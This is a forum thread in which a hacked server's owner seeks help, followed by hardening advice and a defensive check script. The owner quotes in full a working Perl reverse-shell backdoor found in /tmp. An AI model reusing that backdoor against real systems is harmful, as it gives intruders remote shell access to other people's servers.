How can I get security hardening services? My server was hacked

adamp (Verified User, joined Jan 11, 2007, 141 messages)
I have a server, and all of my server is hacked: sites and root.

I reset the pass of admin & root.

I found this script in /tmp called "back", which was a script to open up a backdoor to grant someone root access.
These are the script's contents:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

I've deleted the script.
The script was chowned to apache:wheel, meaning a hole in apache was the way he got in.

Someone told me that I need security hardening services.

He said this:

Based on the fact your system is FreeBSD 4.10, and that Apache is compiled with OpenSSL/0.9.7d .. which is quite old, that's probably why.

What do I need to do? Help me.

Thank you
 
It's probably not Apache itself but a PHP script running on the server somewhere that allowed the file to be uploaded.
 
/tmp should be mounted with nosuid,noexec and chmod 1777

While that is a good idea it will not prevent someone from using the perl command in front of the script. For instance in this case the perl script was called "back." Someone can still run the script like:
Code:
perl /tmp/back
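
The last two replies as checks you can run (an added example, not part of the thread): it verifies the /tmp mount options and mode suggested above, then lists interpreter scripts under a directory, because noexec does not stop `perl /tmp/back`. The function names and the sample mount lines in the comments are assumptions made for this example.

```shell
#!/bin/sh
# Added example; function names and sample values are assumptions, not from the thread.

# check_tmp_opts "<one line of mount output>"
# Succeeds only if both nosuid and noexec appear in the parenthesised options.
# Accepts FreeBSD "(ufs, local, noexec, nosuid)" and Linux "(rw,nosuid,noexec)" styles.
check_tmp_opts() {
    opts=$(printf '%s\n' "$1" | sed -n 's/.*(\(.*\)).*/\1/p' | tr -d ' ')
    case ",$opts," in *,nosuid,*) ;; *) return 1 ;; esac
    case ",$opts," in *,noexec,*) ;; *) return 1 ;; esac
}

# check_tmp_mode DIR
# Succeeds if DIR is a world-writable directory with the sticky bit set (mode 1777).
check_tmp_mode() {
    case "$(ls -ld "$1" 2>/dev/null)" in drwxrwxrwt*) return 0 ;; esac
    return 1
}

# find_scripts DIR [OWNER]
# Prints regular files under DIR whose first line starts with "#!".
# noexec only blocks executing a file directly; "perl /tmp/back" executes perl,
# which lives outside /tmp and reads the script as plain data.
# OWNER (name or numeric uid) narrows the search, e.g. to the web server account.
find_scripts() {
    dir=$1
    owner=${2:-}
    if [ -n "$owner" ]; then
        set -- "$dir" -user "$owner" -type f
    else
        set -- "$dir" -type f
    fi
    find "$@" 2>/dev/null | while IFS= read -r f; do
        first=
        IFS= read -r first <"$f" || :
        case "$first" in '#!'*) printf '%s\n' "$f" ;; esac
    done
}
```

Typical use is `check_tmp_opts "$(mount | grep ' /tmp ')"`, `check_tmp_mode /tmp` and `find_scripts /tmp apache`, where `apache` is the owner the original post reported for the dropped file.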
 